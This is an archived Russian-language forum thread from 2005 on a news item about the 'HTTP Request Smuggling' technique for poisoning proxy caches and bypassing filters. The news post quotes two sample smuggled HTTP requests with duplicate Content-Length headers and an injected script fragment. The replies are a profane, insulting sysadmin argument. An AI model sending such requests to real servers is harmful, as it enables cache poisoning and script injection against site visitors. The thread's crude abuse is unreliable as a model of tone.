The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]

форумы  помощь  поиск  регистрация  майллист  ВХОД  слежка  RSS
"OpenNews: Новая техника HTTP атак"
Вариант для распечатки Архивированная нить - только для чтения! 
Пред. тема | След. тема 
Форумы Разговоры, обсуждение новостей (Public)
Изначальное сообщение [Проследить за развитием треда]

"OpenNews: Новая техника HTTP атак"
Сообщение от opennews on 14-Июн-05, 10:00 
Группа исследователей опубликовала документ (http://www.watchfire.com/resources/HTTP-Request-Smuggling.pdf) описывающий новый вид атаки - "HTTP Request Smuggling" (HRS), направленный на подмену страниц в кеше прокси серверов и обход блокировок контент фильтров и фаерволов.


Идея метода - компоновка нескольких POST/GET запросов в рамках одного HTTP обращения, например:


1      POST http://SITE/foobar.html HTTP/1.1
2      Host: SITE
3      Connection: Keep-Alive  
4      Content-Type: application/x-www-form-urlencoded
5      Content-Length: 0
6      Content-Length: 44
7      [CRLF]
8      GET /poison.html HTTP/1.1
9      Host: SITE
10     Bla: [space after the "Bla:", but no CRLF]
11     GET http://SITE/page_to_poison.html HTTP/1.1
12     Host: SITE
13     Connection: Keep-Alive
14     [CRLF]

Пример 2:

1       POST /some_script.jsp HTTP/1.0
2       Connection: Keep-Alive
3       Content-Type: application/x-www-form-urlencoded
4       Content-Length: 9
5       Content-Length: 204
6  
7       this=thatPOST /vuln_page.jsp HTTP/1.0
8       Content-Type: application/x-www-form-urlencoded
9       Content-Length: 95
10  
11      param1=value1&data=<script></script>alert("stealing...

Сообщается, что проблеме подвержены Tomcat, squid (исправлено в Squid-2.5.STABLE9), apache (mod_proxy ?) и т.д.


URL: http://www.watchfire.com/resources/HTTP-Request-Smuggling.pdf
Новость: https://www.opennet.ru/opennews/art.shtml?num=5619

Cообщить модератору | Наверх | ^

 Оглавление

Сообщения по теме [Сортировка по времени, UBB]


1. "Новая техника HTTP атак"
Сообщение от blackpepper on 14-Июн-05, 10:00 
Вот это ..и т.д... заставляет задуматься
Cообщить модератору | Наверх | ^

2. "Новая техника HTTP атак"
Сообщение от Банзай email(??) on 14-Июн-05, 11:49 
Хорошо сказано: "особенно зашибенный вред возможно причинить, находясь в одной локалке с компрометируемым бекендом".

Еще круто пробки в серверной выворачивать. Отказ в обслуживании будет называться.

Cообщить модератору | Наверх | ^

3. "Новая техника HTTP атак"
Сообщение от Skif (ok) on 14-Июн-05, 12:50 
>Хорошо сказано: "особенно зашибенный вред возможно причинить, находясь в одной локалке с
>компрометируемым бекендом".
>
>Еще круто пробки в серверной выворачивать. Отказ в обслуживании будет называться.


А вам никогда не приходилось закрываться даже от своих? Не приходилось бороться со снифферами в локалке? Менять почти каждую неджелю пароли, потому что народ не дремлет?
Так что это очень даже актуально. И прикалываться не стоит.
Потом, некоторые провайдеры нарезают клиентам сетки в 24 бита. И вася пупкин может оказаться в моей "локалке" только потому что пров один.

Cообщить модератору | Наверх | ^

4. "Новая техника HTTP атак"
Сообщение от toor99 email(ok) on 14-Июн-05, 13:57 
А еще бывают data centers. Стойки с хостинговыми серверами. С серверами, поставленными на colocation. И так далее; но он об этом не знает и не догадывается :)
Cообщить модератору | Наверх | ^

5. "со снифферами в локалке? - до пезде дверь."
Сообщение от Банзай email(??) on 15-Июн-05, 02:07 
1. Репутация колокейшена
2. SSL на все чувствительные соединения - обснифайся весь
3. Вилкам повыёбываться. Первый пакет нарушителя в "гандоны.лог", последующие в - дыру
4. О чем вы вообще?! Что за колокейшн, в котором вы не уверены относительно гарантий физического доступа к консоли?! Это осталось только в Трипиздищеве и Северной Корее.
Cообщить модератору | Наверх | ^

7. "со снифферами в локалке? - до пезде дверь."
Сообщение от Алекс (??) on 15-Июн-05, 18:05 
запросы например к squid тоже на ssl?
вы видимо находитесь в юсе или канаде?  ибо в России дебилов,считающих перечисленные вами меры достаточными и применимыми к постоянному использованию уже давно неосталось
сударь,вы сильно напоминаете воинствующего дилетанта
Cообщить модератору | Наверх | ^

9. "запросы к squid тоже на ssl? -  а у вас"
Сообщение от Банзай email(??) on 23-Июн-05, 20:04 
squid на колокейшене?

И что он там делает?

http://cisco.opennet.ru/openforum/vsluhforumID12/434.html

Вот этого вам не хватает?

сударь,вы сильно напоминаете хобби-линуксиста из глухого селения.

Cообщить модератору | Наверх | ^

11. "запросы к squid тоже на ssl? -  а у вас"
Сообщение от sith on 29-Июн-05, 19:34 
squid на колокейшене может выполнять, например, функции ускорителя и балансировшика нагрузки; а вы, кстати, сильно напоминаете мудака.
Cообщить модератору | Наверх | ^

12. "rtfm"
Сообщение от guest (??) on 30-Июл-05, 02:09 
squid-cache.org , google.com помогут Вам найти ответ на этот вопрос.
Cообщить модератору | Наверх | ^

8. "Новая техника HTTP атак"
Сообщение от t0ly on 16-Июн-05, 13:02 
нравятся мне ваши дебаты... кратко, локонично, и без флуда что самое главное =)
Cообщить модератору | Наверх | ^

Удалить

Индекс форумов | Темы | Пред. тема | След. тема




Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру